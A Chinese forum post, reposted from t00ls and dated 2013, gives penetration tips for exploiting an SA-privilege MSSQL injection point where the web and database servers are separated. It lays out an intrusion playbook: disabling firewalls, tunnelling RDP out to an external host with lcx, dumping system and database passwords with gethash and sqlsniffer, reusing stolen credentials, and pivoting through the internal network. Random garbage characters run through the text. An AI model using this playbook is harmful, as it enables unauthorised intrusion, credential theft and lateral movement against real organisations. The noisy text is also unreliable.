当你碰到SA的注入点,可以执行命令,但是web与数据库分离,你都会怎么做呢,当数据库不服务器不能连接外网的时候,是不是只想着从web搞呢,这篇文章从t00ls转载过来,希望对大家sa权限的注入点数据库web分离提供一些渗透思路。: l' [$ P4 C m
o" S/ J" s$ X/ v3 w6 @1 A P# Y
9 R" P9 D, n; J$ ^$ @
% t7 j$ P/ \8 B6 `6 _SA点,system权限,可执行命令,web和db分离.DB机器不上网(一般指中马不上线,lcx反弹不出)
4 x; y0 i4 q; Z+ F3 y
, c- r& r7 r7 e" b; x% |. T/ j
! `; M/ b1 V8 [ Z* x# i6 y$ H一、DB机有公网IP.' t$ P: g' \2 D# V. }
, {" f6 V# p, Q3 M# @. `, v3 J0 m& H
1:执行命令把系统防火墙和ip策略停止,netstat -an找到3389端口尝试连接.! ^1 C! e4 v6 P [0 }
- p& p. K9 m3 o+ j" y
9 d; Q) u5 a9 s3 X0 l2:从内往外扫描.把命令行下的s扫描器转成vbs传上DB机器生成exe扫描外网一台做了端口策略的机器.这台外网机器开放所有端口.(可以到网上找这 样的 机器.) 如果扫描结果有开放端口,证明在这台DB机可以把3389转到外面机器.比如扫到80 那就lcx -slave ip 80 127.0.0.1 3389.
7 c4 b/ O# U+ f& Q/ `: O6 I* L2 c' t1 y2 M, [( C
' @* c9 P M+ Z" b! W6 _
3:尽量多拿密码.用vbs的方法上传gethash,sqlsniffer类的工具.拿到系统和mssql的密 码,数据库表的后台管理员密码,member表的最前几个用户密码.这些密码可以用来测试web后台,web的3389 ftp等.当然事先要对web机器完整扫描一遍. www.2cto.com! m: j% [2 R( Y2 Z& Q
; q/ I0 Q, x8 x
, j. b! l8 {' A4,nmap扫描.用nmap扫描web和db机器的1-65535端口.如果发现db机器显示有closed的端口.那恭喜你,你可以lcx -tran 把3389转发到该端口直接登陆.firewalk也有类似功能.但对代理防火墙无用.
1 |! a7 y. G( W2 K+ G
) `, ]- w, @* c7 |! D" S
% w) B# [; x% f. _1 V$ R
( {( x: ?0 I5 f' k二、DB机只有内网IP+ E- }/ a, D$ @" A
- o* h) _( j' ~# @0 j5 q, @! g( h1:尽量多拿密码来net use到web机器.这个过程需要极大的耐心 , 拿密码尝试登陆web后台等.1 g* l- Z x& o# r4 z, O
1 j6 d; D. _- t; D5 o$ s
1 @" V: N4 n/ v3 q6 D2:停掉防火墙和IP策略再从内往外扫描.
8 m7 |3 b1 L/ F J8 }* K3 }
" A. B# F. l9 U/ V1 ~) R
8 J9 z9 a2 g1 Z* j i" A6 o3: ipconfig /dispalydns如果发现有公网的域名,极大可能是路由做了手脚.机会还是有的." ]" K- ~ }, W6 M3 L) M" M; { R
. y* }+ B6 [' i
: Y7 ~# [% x& y; `" \5 Q
4:学会密码规律分析往往会有惊喜.3 X0 x. e( S' ^( ?7 D
1 j) P% U. b# R/ p; E9 y
4 E+ ?. }/ ~: p+ K5,在sa点里执行命令渗透内网,找可上网的机器.isql,ipc共享,wmi等/ [5 c2 M' ^4 `. | z2 T, ^
4 x5 q9 X, Z! l0 n; z. z: w' G
: n" t' w+ X9 x u2 w, H有些地区或国家会禁止别的国家连接一些端口,所以拥有目标国代理或VPN是很重要的 |
发表于 2013-2-16 21:46:01
收藏
支持
反对